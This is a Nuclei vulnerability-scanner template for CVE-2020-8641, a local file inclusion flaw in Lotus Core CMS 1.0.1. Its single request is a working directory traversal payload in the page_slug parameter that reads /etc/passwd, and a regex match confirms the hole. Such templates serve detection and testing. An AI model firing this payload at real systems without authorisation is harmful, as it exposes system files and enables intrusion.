nuclei-templates/cves/2020/CVE-2020-8641.yaml

33 lines
828 B
YAML

id: CVE-2020-8641
info:
name: Lotus Core CMS 1.0.1 - Local File Inclusion
author: 0x_Akoko
severity: high
tags: cve,cve202,lfi,lotus
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2020-8641
- https://cxsecurity.com/issue/WLB-2020010234
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.80
cve-id: CVE-2020-8641
cwe-id: CWE-22
description: "Lotus Core CMS 1.0.1 allows authenticated Local File Inclusion of .php files via directory traversal in the index.php page_slug parameter."
requests:
- method: GET
path:
- '{{BaseURL}}/index.php?page_slug=../../../../../etc/passwd%00'
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200